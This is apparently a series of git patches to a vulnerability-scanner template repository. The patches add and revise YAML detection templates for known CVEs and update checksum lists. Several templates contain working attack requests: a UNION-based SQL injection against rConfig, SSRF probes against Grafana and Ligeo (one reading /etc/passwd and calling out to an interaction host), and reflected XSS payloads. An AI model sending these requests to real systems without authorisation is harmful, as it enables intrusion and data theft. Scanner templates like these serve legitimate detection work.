00:00:00 2001 From: Tarunkant Gupta Date: Thu, 31 Aug 2023 23:08:16 +0530 Subject: [PATCH 0042/1090] Adding one more path in CVE-2020-13379.yaml --- http/cves/2020/CVE-2020-13379.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index ffe2cb9506..f89c67e0a8 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -32,7 +32,9 @@ http: - method: GET path: - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + - "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + stop-at-first-match: true matchers-condition: and matchers: - type: word From 2f34f7c4b23c506e9968aa650c61b1575d658d51 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 1 Sep 2023 00:52:01 +0530 Subject: [PATCH 0043/1090] Update rconfig-file-upload.yaml --- http/vulnerabilities/other/rconfig-file-upload.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml index 3604834e61..3ef207e3ca 100644 --- a/http/vulnerabilities/other/rconfig-file-upload.yaml +++ b/http/vulnerabilities/other/rconfig-file-upload.yaml @@ -1,20 +1,21 @@ -id: rconfig-rce +id: rconfig-file-upload info: name: rConfig 3.9.5 - Arbitrary File Upload author: dwisiswant0 severity: high - description: rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + description: | + rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.5.zip + - https://www.exploit-db.com/exploits/48878 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cwe-id: CWE-434 - reference: - - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - - https://www.exploit-db.com/exploits/48878 - tags: rconfig,rce,edb metadata: max-request: 1 + tags: rconfig,rce,edb http: - raw: From d425d8da65de492d53052968494339b92900b4f0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 1 Sep 2023 00:53:15 +0530 Subject: [PATCH 0044/1090] Create CVE-2020-10220.yaml --- http/cves/2020/CVE-2020-10220.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2020/CVE-2020-10220.yaml diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml new file mode 100644 index 0000000000..0477265785 --- /dev/null +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-10220 + +info: + name: rConfig 3.9 - SQL injection + author: ritikchaddha + severity: critical + description: | + An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. + reference: + - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-10220 + classification: + cve-id: CVE-2020-10220 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + shodan-query: title:"rConfig" + tags: cve,cve2020,rconfig,sqli + +variables: + num: "999999999" + +http: + - raw: + - | + GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 From 42b3dfeeb48a4dfb3d6ba8595831ca62fd3a79d6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 1 Sep 2023 01:19:52 +0530 Subject: [PATCH 0045/1090] Create CVE-2021-46107.yaml --- http/cves/2021/CVE-2021-46107.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2021/CVE-2021-46107.yaml diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml new file mode 100644 index 0000000000..ba7372945c --- /dev/null +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-46107 + +info: + name: Ligeo Archives Ligeo Basics - Server Side Request Forgery + author: ritikchaddha + severity: high + description: | + Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. + reference: + - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py + - https://nvd.nist.gov/vuln/detail/CVE-2021-46107 + classification: + cve-id: CVE-2021-46107 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-918 + metadata: + max-request: 1 + verified: true + shodan-query: title:"Ligeo" + fofa-query: title="Ligeo" + tags: cve,cve2021,ligeo,ssrf,lfr + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + GET /archive/download?file=file:///etc/passwd HTTP/1.1 + Host: {{Hostname}} + + - | + GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')" + - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')" From c489128f2c74c23b68e5f36d1ec010856828f83b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 02:50:44 +0000 Subject: [PATCH 0046/1090] Auto Generated New Template Addition List [Fri Sep 1 02:50:44 UTC 2023] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 78570d1c2e..64151e7a60 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,8 @@ http/cnvd/2021/CNVD-2021-32799.yaml http/cves/2016/CVE-2016-10108.yaml +http/cves/2018/CVE-2018-15917.yaml http/cves/2020/CVE-2020-11798.yaml +http/cves/2021/CVE-2021-46107.yaml http/cves/2022/CVE-2022-22897.yaml http/cves/2023/CVE-2023-20073.yaml http/cves/2023/CVE-2023-26469.yaml From 8957e95908937fd5deec4004c0c489cb5c7c8083 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 02:50:53 +0000 Subject: [PATCH 0047/1090] Auto Generated Templates Checksum [Fri Sep 1 02:50:53 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 825b0008e3..5f90b38bc6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2032,6 +2032,7 @@ http/cves/2021/CVE-2021-46069.yaml:4a66853e90d99951c71c877bb4f3912ad58d21ca http/cves/2021/CVE-2021-46071.yaml:e72f5409191f3fdcf79c20316aa900616aea5d91 http/cves/2021/CVE-2021-46072.yaml:a2b12e554f7f5713084305bf3f5a005a43dc0cd4 http/cves/2021/CVE-2021-46073.yaml:b3b6ebe4a5cad18f2900529a17d133cbcc048238 +http/cves/2021/CVE-2021-46107.yaml:5f300c8a7ac163ed6bba25cf894cb41dc7aaea6f http/cves/2021/CVE-2021-46379.yaml:9cef057ba92e93d700d00e0a80569c02278c6cd6 http/cves/2021/CVE-2021-46381.yaml:55315c21c062982a73fcf7ef3b843e59c25f6953 http/cves/2021/CVE-2021-46387.yaml:224cf815250e716166a2f1a7abce55b048ab93a6 @@ -7030,7 +7031,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:d870019ea88cbf135ce6da5ba999cc09d4894bba +templates-checksum.txt:dfee7afe890c59845f4f2c2e72222a0daac81e00 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 3194deebc45258433a889599db0e2a5bc6bb9fbc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 02:52:14 +0000 Subject: [PATCH 0048/1090] TemplateMan Update [Fri Sep 1 02:52:14 UTC 2023] :robot: --- http/cves/2021/CVE-2021-46107.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index ba7372945c..466d24fa8a 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -10,15 +10,15 @@ info: - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py - https://nvd.nist.gov/vuln/detail/CVE-2021-46107 classification: - cve-id: CVE-2021-46107 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 + cve-id: CVE-2021-46107 cwe-id: CWE-918 metadata: - max-request: 1 - verified: true - shodan-query: title:"Ligeo" fofa-query: title="Ligeo" + max-request: 3 + shodan-query: title:"Ligeo" + verified: true tags: cve,cve2021,ligeo,ssrf,lfr http: From fa54196a624b3fef9671a9dfd1a3758501f07588 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 02:52:49 +0000 Subject: [PATCH 0050/1090] Auto Generated Templates Checksum [Fri Sep 1 02:52:49 UTC 2023] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5f90b38bc6..0c7a030339 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1413,7 +1413,7 @@ http/cves/2020/CVE-2020-13121.yaml:9dc7b16d238c0f459e1c859af2eee995a490a654 http/cves/2020/CVE-2020-13158.yaml:f62235f5a3b204038b3da15490ab9114643183b8 http/cves/2020/CVE-2020-13167.yaml:65c3c0a11291c74e4ccb4e0b79ed0957d0a8de7c http/cves/2020/CVE-2020-13258.yaml:aa3db4375fb4584fac99169f08ac1cda299855f3 -http/cves/2020/CVE-2020-13379.yaml:4c62c2dda3258e27300b0607a29312d19622297d +http/cves/2020/CVE-2020-13379.yaml:9b132983130683cf205fb619c8f5253cecb56b23 http/cves/2020/CVE-2020-13405.yaml:364c8a655d463164f79a3da5c045565d4fa9ff57 http/cves/2020/CVE-2020-13483.yaml:34af617d306d7bf273b42a8056f5025cd910a442 http/cves/2020/CVE-2020-13700.yaml:1a7bc8e4b8c9e42c098330b55f7f2365e48c71ca @@ -2032,7 +2032,7 @@ http/cves/2021/CVE-2021-46069.yaml:4a66853e90d99951c71c877bb4f3912ad58d21ca http/cves/2021/CVE-2021-46071.yaml:e72f5409191f3fdcf79c20316aa900616aea5d91 http/cves/2021/CVE-2021-46072.yaml:a2b12e554f7f5713084305bf3f5a005a43dc0cd4 http/cves/2021/CVE-2021-46073.yaml:b3b6ebe4a5cad18f2900529a17d133cbcc048238 -http/cves/2021/CVE-2021-46107.yaml:5f300c8a7ac163ed6bba25cf894cb41dc7aaea6f +http/cves/2021/CVE-2021-46107.yaml:a1658d92714c11c9665ff45882cb7458bb5f4f8c http/cves/2021/CVE-2021-46379.yaml:9cef057ba92e93d700d00e0a80569c02278c6cd6 http/cves/2021/CVE-2021-46381.yaml:55315c21c062982a73fcf7ef3b843e59c25f6953 http/cves/2021/CVE-2021-46387.yaml:224cf815250e716166a2f1a7abce55b048ab93a6 @@ -7031,7 +7031,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:dfee7afe890c59845f4f2c2e72222a0daac81e00 +templates-checksum.txt:1fac060039113823ee275fbf0ce92a110e7f1c25 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 57b1bc174f8f9edff9e849a8707e88164ce21dbe Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 1 Sep 2023 08:23:59 +0530 Subject: [PATCH 0051/1090] tags and metadata added --- http/vulnerabilities/other/rconfig-file-upload.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml index 3ef207e3ca..b3635e1d8a 100644 --- a/http/vulnerabilities/other/rconfig-file-upload.yaml +++ b/http/vulnerabilities/other/rconfig-file-upload.yaml @@ -15,7 +15,9 @@ info: cwe-id: CWE-434 metadata: max-request: 1 - tags: rconfig,rce,edb + shodan-query: title:"rConfig" + verified: true + tags: rconfig,rce,edb,file-upload,instrusive http: - raw: From af9148890b937d97705d44d2db2b11163454937f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 02:54:41 +0000 Subject: [PATCH 0052/1090] TemplateMan Update [Fri Sep 1 02:54:41 UTC 2023] :robot: --- http/cves/2020/CVE-2020-13379.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index f89c67e0a8..b6f0673525 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -18,14 +18,14 @@ info: cvss-score: 8.2 cve-id: CVE-2020-13379 cwe-id: CWE-918 - epss-score: 0.16322 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-score: 0.16322 metadata: - max-request: 1 - shodan-query: title:"Grafana" - verified: true - vendor: grafana + max-request: 2 product: grafana + shodan-query: title:"Grafana" + vendor: grafana + verified: true tags: cve,cve2020,grafana,ssrf http: From 0d9daed8d8a2e6aaea9d9e82ca1c8fba9aabba43 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 1 Sep 2023 08:25:12 +0530 Subject: [PATCH 0053/1090] matchers-condition: and added --- http/cves/2020/CVE-2020-10220.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index 0477265785..860bb427fd 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -29,6 +29,7 @@ http: GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word part: body From a72b3a4f113f6147c2f9eeaab753a55a0ac5bbef Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 03:02:32 +0000 Subject: [PATCH 0054/1090] Auto Generated New Template Addition List [Fri Sep 1 03:02:32 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 64151e7a60..f8e33bf79f 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cnvd/2021/CNVD-2021-32799.yaml http/cves/2016/CVE-2016-10108.yaml http/cves/2018/CVE-2018-15917.yaml +http/cves/2020/CVE-2020-10220.yaml http/cves/2020/CVE-2020-11798.yaml http/cves/2021/CVE-2021-46107.yaml http/cves/2022/CVE-2022-22897.yaml From 4d2c756aeef01d066bc820ef5534fe6caca474e3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 03:02:37 +0000 Subject: [PATCH 0055/1090] Auto Generated Templates Checksum [Fri Sep 1 03:02:37 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0c7a030339..18fab056b9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1379,6 +1379,7 @@ http/cves/2019/CVE-2019-9978.yaml:29fa05916d940a02b2052750609450962d826369 http/cves/2020/CVE-2020-0618.yaml:fb8a86443513fb8dfb8bfd4ef48846be61fbd046 http/cves/2020/CVE-2020-10148.yaml:785c887c894285e141a8c3ec6d81dbf0ca321825 http/cves/2020/CVE-2020-10199.yaml:148ba582f0b0a858b2974d29715f40352211ead0 +http/cves/2020/CVE-2020-10220.yaml:d4198c17d90c22e291f9ffcf41aa5838efcb3b70 http/cves/2020/CVE-2020-10546.yaml:064a059d47a385fd83a9b1b62793b5891e9e5b07 http/cves/2020/CVE-2020-10547.yaml:58b39f2460d859c96b62ab0697151b9d6334808e http/cves/2020/CVE-2020-10548.yaml:379ae6d4c78187bc1e20dcf6ec9fb27ede275db3 @@ -1413,7 +1414,7 @@ http/cves/2020/CVE-2020-13121.yaml:9dc7b16d238c0f459e1c859af2eee995a490a654 http/cves/2020/CVE-2020-13158.yaml:f62235f5a3b204038b3da15490ab9114643183b8 http/cves/2020/CVE-2020-13167.yaml:65c3c0a11291c74e4ccb4e0b79ed0957d0a8de7c http/cves/2020/CVE-2020-13258.yaml:aa3db4375fb4584fac99169f08ac1cda299855f3 -http/cves/2020/CVE-2020-13379.yaml:9b132983130683cf205fb619c8f5253cecb56b23 +http/cves/2020/CVE-2020-13379.yaml:05f9450e2fd21df27c555b164451a4c25a308a68 http/cves/2020/CVE-2020-13405.yaml:364c8a655d463164f79a3da5c045565d4fa9ff57 http/cves/2020/CVE-2020-13483.yaml:34af617d306d7bf273b42a8056f5025cd910a442 http/cves/2020/CVE-2020-13700.yaml:1a7bc8e4b8c9e42c098330b55f7f2365e48c71ca @@ -6578,7 +6579,7 @@ http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:67 http/vulnerabilities/other/qihang-media-disclosure.yaml:dad6da0182625d9a95acdfec0df21b049c4daa8d http/vulnerabilities/other/qihang-media-lfi.yaml:3b581630106e3bd04f75366c9076ee8f1b8e8832 http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:2382325fe062c56d0e35cc5384647750325f58dd -http/vulnerabilities/other/rconfig-file-upload.yaml:bb0dc040e78ff6d9e6208aae64bf290ece7641a4 +http/vulnerabilities/other/rconfig-file-upload.yaml:b69bd7f2506e74dc3031fd6c5c4bab47e3f7f7fe http/vulnerabilities/other/reddittop-rss-xss.yaml:03df8cb7029692c3157660f0aca9c22ee86884a8 http/vulnerabilities/other/resin-cnnvd-200705-315.yaml:4d3d645b58f506e86281f8dd0b487c34b6f6bbb5 http/vulnerabilities/other/resin-inputfile-fileread.yaml:99d1e9dc54f4ee317305d67f01721d137ddbd9d5 @@ -7031,7 +7032,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:1fac060039113823ee275fbf0ce92a110e7f1c25 +templates-checksum.txt:9e5fcb0888ac506996f56dea550bba9ca15dc63d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From a2db8b7ec5adc6b7c81daa00cf1ac09ce4a78fce Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 1 Sep 2023 08:34:21 +0530 Subject: [PATCH 0056/1090] payload updation --- http/cves/2020/CVE-2020-2036.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 7ea4ef0766..32e2b39196 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -26,26 +26,26 @@ info: http: - raw: - | - GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E HTTP/1.1 + GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} - | - GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1 + GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} - | - GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1 + GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - - "!contains(tolower(body_1), '')" + - "!contains(tolower(body_1), '')" condition: and - type: dsl dsl: - - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')" - - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')" + - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')" + - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')" condition: or From 8a63c3a8da4bf3b6b53dcb166dc3fdb0fcc564d2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 1 Sep 2023 08:39:44 +0530 Subject: [PATCH 0057/1090] Update and rename rdap.yaml to rdap-whois.yaml --- .../{rdap.yaml => rdap-whois.yaml} | 26 +++++++------------ 1 file changed, 10 insertions(+), 16 deletions(-) rename http/miscellaneous/{rdap.yaml => rdap-whois.yaml} (87%) diff --git a/http/miscellaneous/rdap.yaml b/http/miscellaneous/rdap-whois.yaml similarity index 87% rename from http/miscellaneous/rdap.yaml rename to http/miscellaneous/rdap-whois.yaml index 8653977b67..dfe0f14834 100644 --- a/http/miscellaneous/rdap.yaml +++ b/http/miscellaneous/rdap-whois.yaml @@ -1,37 +1,31 @@ -id: rdap +id: rdap-whois info: name: RDAP WHOIS + author: ricardomaia + severity: info description: | RDAP (Registration Data Access Protocol) is a standard defined by the IETF to replace the whois protocol in queries for information about Internet resource records such as domain names, IP addresses, and ASNs. - author: ricardomaia - severity: info + reference: + - https://about.rdap.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - reference: - - https://about.rdap.org/ - tags: misc,dns,domain,whois,rdap metadata: max-request: 1 + verified: true + tags: misc,dns,domain,whois,rdap http: - method: GET - redirects: true - max-redirects: 3 - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 - Accept: "*/*" - Pragma: no-cache - Cache-Control: no-cache - sec-fetch-mode: navigate - sec-fetch-site: none - sec-fetch-dest: document path: - "https://www.rdap.net/domain/{{Host}}" + redirects: true + max-redirects: 3 + extractors: - type: json part: body From d075b59bc6b25e684ed34f9932bbbfd100f835a5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 04:02:09 +0000 Subject: [PATCH 0058/1090] Auto WordPress Plugins Update [Fri Sep 1 04:02:09 UTC 2023] :robot: --- helpers/wordpress/plugins/all-in-one-seo-pack.txt | 2 +- helpers/wordpress/plugins/better-wp-security.txt | 2 +- helpers/wordpress/plugins/broken-link-checker.txt | 2 +- helpers/wordpress/plugins/cookie-law-info.txt | 2 +- helpers/wordpress/plugins/loco-translate.txt | 2 +- helpers/wordpress/plugins/maintenance.txt | 2 +- helpers/wordpress/plugins/ml-slider.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - 